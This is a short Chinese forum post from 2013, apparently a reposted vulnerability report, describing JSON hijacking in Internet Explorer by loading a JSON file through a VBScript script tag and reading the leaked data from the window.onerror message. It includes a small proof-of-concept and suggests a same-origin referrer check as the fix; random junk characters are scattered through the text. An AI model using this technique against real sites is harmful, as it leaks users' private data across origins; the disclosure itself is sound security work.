简要描述:7 d' D% C8 M2 D8 y
0 A9 ^! v& K7 o" Z6 R% R
由于某些资源容器对数据处理不当导致json劫持漏洞.; N- w% C/ d) N8 G) ?! V
详细说明:1 e! P0 X& k4 M; d
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
, D) K, E5 {/ ~' }3 j1 _5 S<script language=vbscript></script>, ^6 b0 {: e5 ~2 G W
3 W! K! a) P) K当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
/ O$ l! D$ D4 X) @8 b5 c( Q/ m漏洞证明:$ v4 G" F0 A0 R
<script>- X2 N; I/ A ?' U1 R% v* D0 N
window.onerror=function(_){3 N! w; n" Y! Y* I: P
alert(_)+ }3 z( u+ V' g$ ~) F2 c
}" Z8 s) z3 ?& H- Y+ \
</script>' B7 x& i: W+ q/ ^1 [# e
<script language=vbscript src=1.json></script>
( u7 T4 q G5 R, ^' V" U
- _* B/ m0 I0 C+ n- I% } ; q# h$ s# `! A% H R" p
1.json:' I/ z" U# n$ C) {# E
[{"name":"sogili","age":19}]
: w5 h) w4 l/ L修复方案:0 c8 c$ n* o+ s% t
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对